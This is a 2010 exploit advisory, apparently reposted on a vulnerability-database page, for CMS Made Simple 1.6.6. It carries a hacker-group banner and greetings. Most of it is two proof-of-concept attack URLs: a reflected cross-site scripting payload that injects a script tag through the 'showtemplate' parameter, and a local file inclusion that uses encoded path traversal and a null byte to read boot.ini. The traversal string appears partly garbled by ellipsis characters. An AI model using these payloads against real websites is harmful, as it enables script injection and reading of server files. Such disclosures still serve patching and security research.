Lucene search
SecurityvulnsSECURITYVULNS:DOC:23232HistoryFeb 16, 2010 - 12:00 a.m.
cmsmadesimple Multiple Security Issues : XSS+ LFI
2010-02-1600:00:00
vulners.com
58
################################################################
.___ __ _______ .___
| /_ ______| | __ ____ \ _ \ | /
/ __ |\__ \\_ __ \ |/ // __\/ /\ \ / __ |/ __ \
/ // | / __ \| | \/ <\ \\ \/ \/ // \ ___/
\____ |(/| || \\>\_ /\_____|\____\
\/ \/ \/
___________ ______ _ __
_/ _\ __ \/ __ \ \/ \/ /
\ \___| | \/\ ___/\ /
\___ >| \_ >\/\_/
est.2007 \/ \/ forum.darkc0de.com
################################################################
Greetz to all Darkc0de ,AI,ICW, AH Memebers
Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,
Author: Beenu Arora
Home : www.BeenuArora.com
Email : [email protected]
Share the c0de!
################################################################
Exploit: Multiple Vulnerablities in cmsmadesimple
AppSite: http://www.cmsmadesimple.com/
Tested Version : 1.6.6
XSS
POC:-http://localhost/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
Multiple Local File Inclusion
Sample URL:
POC:-http://localhost:80/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c…%5c…%5c%5c…%5c…%5c%5c…%5c…%5c%5c…%5c…%5c%5c…%5c…%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39
################################################################